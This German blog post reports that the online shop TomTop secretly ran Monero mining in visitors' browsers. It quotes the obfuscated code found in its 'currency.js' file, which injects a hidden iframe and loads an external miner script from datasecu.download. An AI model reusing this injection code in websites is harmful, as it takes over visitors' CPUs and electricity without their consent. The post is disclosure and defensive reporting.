Tom­Top: Kryp­to­wäh­rung-Mining wird im Online-Shop ver­steckt eingesetzt

TomTop

Der Chi­na-Online-Groß­han­del Tom­Top ver­wen­det neu­er­dings ein Script, mit dem Mone­ro-Mining betrie­ben wird. Die­ses Ver­fah­ren ist aller­dings ziem­lich umstrit­ten, wenn sogar nicht ganz legal.

Tom­Top ist ein Chi­na-Groß­han­del als Online-Shop mit diver­sen Pro­duk­ten, die selbst ver­sen­det wer­den. Dort bekommt man nicht nur den klas­si­schen Chi­na-Ramsch, son­dern auch „Mar­ken­pro­duk­te” wie die DJI Drohne.

Wer ger­ne auf Gad­gets und/oder Ramsch steht, die aus dem Aus­land kom­men, wird frü­her oder spä­ter schon auf Tom­Top gera­ten sein. In letz­ter Zeit ist der Online-Shop aber auch dafür bekannt, die DJI Droh­ne in ver­schie­de­nen Aus­füh­run­gen mit­tels Gut­schein-Code zu einem Kampf­preis zu verkaufen.

Ich per­sön­lich habe dort habe noch nichts bestellt, ken­ne aber vie­le, die es tun und beruf­lich set­ze ich mich auch mit dem Online-Shop viel aus­ein­an­der. So ist es mitt­ler­wei­le auch kein Geheim­nis mehr, dass die Waren, die eigent­lich ver­zollt wer­den müs­sen, über gewis­se Län­der (London/Niederlande) ver­sen­det wer­den, um „den Zoll zu umge­hen” oder dekla­rie­ren den Waren­wert viel nied­ri­ger, als er eigent­lich ist.

Ges­tern stol­per­te ich wie­der auf die Web­sei­te und muss­te fest­stel­len, dass die Lüf­tung vom CPU-Lüf­ter plötz­lich in die Höhe schoss. Ein Blick in den Win­dows Task-Man­ger zeig­te, dass die Last des CPUs mas­siv anstieg. Sofort kam der Ver­dacht auf, dass ein Script dafür ver­ant­wort­lich ist, womit Kryp­to­wäh­rung geschürft wird.

Es ist mitt­ler­wei­le mög­lich, dass man mit einem Script auf einer Web­sei­te die CPU eines Web­sei­ten-Besu­chers ver­wen­det wer­den kann, um Rechen­ope­ra­tio­nen durch­zu­füh­ren. Dafür erhält der Ver­wen­der des Scripts dann eine Ver­gü­tung, in der Regel in der sel­ben Wäh­rung, wofür die Besu­cher die Kryp­to­wäh­rung schürft.

Das Pro­blem an die­ser Sache ist aber, dass die Betrei­ber einer Web­sei­te sich durch die­se neue Mög­lich­keit ver­lei­ten lässt, unge­fragt die CPU des Besu­chers für sol­che Zwe­cke zu miss­brau­chen. Nach Recher­chen hin setzt Tom­Top genau nun die­se Metho­de im eige­nen Online-Shop ein. Jeder Besu­cher, der die Web­sei­te auf­ruft, ruft auto­ma­tisch im Brow­ser das Script auf, womit die eige­ne CPU ver­wen­det wird, um die Rechen­auf­ga­ben durch­zu­füh­ren. Ungefragt.

Gera­de das heim­li­che Schürf­ten sol­cher Ope­ra­tio­nen ste­hen schon lan­ge in der Kri­tik, weil der Besu­cher der Web­sei­te in der Regel ers­tens nichts davon weiß und zwei­tens es auch noch unge­fragt gemacht wird.

Mei­ne Recher­chen zeig­ten, dass die Java­Script-Datei „currency.js” in der neu­es­ten Ver­si­on eben solch ein Code beinhal­tet, um die Rechen­ope­ra­tio­nen anzu­sto­ßen. In die­ser Datei wird ein ande­rer Script gela­den unter der URL „https://www.datasecu.download/lot.html”, wo dann letzt­end­lich das Mining ange­sto­ßen wird beim Besucher.

var currencyRate = new Array(); currencyRate["CNY"] = 6.65; currencyRate["USD"] = 1.0; currencyRate["EUR"] = 0.83; [...] var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);
[...] <script src="https://www.datasecu.download/mb64.js"></script> <script> var eggplant = Gurke.Anonymous('489djE22mdZ3j34vhES98tCzfVn57Wq4fA8JR6uzgHqYCfYE2nmaZxmjepwr3GQAZd3qc3imFyGPHBy4PBWLb4tc1X8ADsu',{throttle: 0.4}); eggplant.start(); </script> [...]

Das Beson­de­re hier­bei ist, dass ver­sucht wird zu ver­schlei­ern, dass man eben einen exter­nen Script ver­wen­det, um Kryp­to­wäh­rung (Mone­ro) zu schür­fen. Des­wei­te­ren ist es noch inter­es­sant, dass der eigent­li­che Script hin­ter einer Domain steckt, die ziem­lich unbe­kannt ist. Selbst die geläu­figs­ten Fil­ter­lis­ten ken­nen die­se Domain nicht, sodass das Script für das Schür­fen nicht blo­ckiert wird.

Im Umkehr­schluss heißt das also, dass so ziem­lich jeder Besu­cher davon betrof­fen ist, sofern man eben nicht Java­Script im Brow­ser selbst deak­ti­viert hat oder nur auf Tom­Top. Selbst AdBlo­cker oder spe­zi­ell pro­gram­mier­te Brow­ser-AddOns, die das (unge­frag­te) Schür­fen ver­hin­dern, kön­nen das nicht ver­hin­dern. Auch der in Ope­ra im Sys­tem inte­grier­te „NoCoin”-Schutz (Mining-Schutz für Kryp­to­wäh­rung) ist im Selbst­test machtlos.

Laut Simi­lar­Web hat­te der Online-Shop im letz­ten Monat (Febru­ar 2018) rund zehn Mil­lio­nen Besu­cher. Für ein­hun­dert Besu­cher, die durch­schnitt­lich drei Minu­ten auf der Web­sei­te ver­wei­len und das Script ent­spre­chend (gezwun­gen) am lau­fen hat, bekommt der Ver­wen­der des Scripts 0,000286 XMR (Mone­r­os). Umge­rech­net sind das etwa 0,02 Euro. Auf zehn Mil­lio­nen Besu­cher sind das dem­entspre­chend rund 2.000 Euro pro Tag, im Monat rund 69.000 Euro. Eine stol­ze Sum­me und das geht zur Last der Besu­cher, die durch die erhöh­te CPU-Last auch ent­spre­chend mehr Strom verbrauchen.

Nun wis­sen wir also, dass der Chi­na-Shop Tom­Top unge­fragt die CPU sei­ner Besu­cher ver­wen­det, um sich selbst zu berei­chern. Die ein­zi­ge Maß­nah­me um das zu ver­hin­dern ist, die Domain „datasecu.download” zu blo­ckie­ren. Um glo­bal Erfolg zu haben, soll­ten bei­spiels­wei­se auch die Fil­ter­lis­ten die Domain auf die „Black­list” neh­men. Dar­um habe ich mich schon gekümmert.

Eine Rück­mel­dung von Tom­Top, sowie von Coin­hi­ve (rea­li­siert das CPU-Mining) erfolg­te bis heu­te nicht. Auf­grund des­sen wer­de ich noch ein paar ande­ren Medi­en dar­auf auf­merk­sam machen und hof­fe, dass ich damit ein Stein ins Rol­len brin­ge, sodass das unmo­ra­li­sche Han­deln von Tom­Top been­det wird. Auch wenn es letzt­end­lich sicher­lich hei­ßen wird, dass man es nur für eine kur­ze Zeit in Ver­wen­dung hat­te, um es zu tes­ten oder, dass man davon gar nichts wusste.

Anmer­kun­gen zum Bei­trag? Hin­weis an die Redak­ti­on sen­den.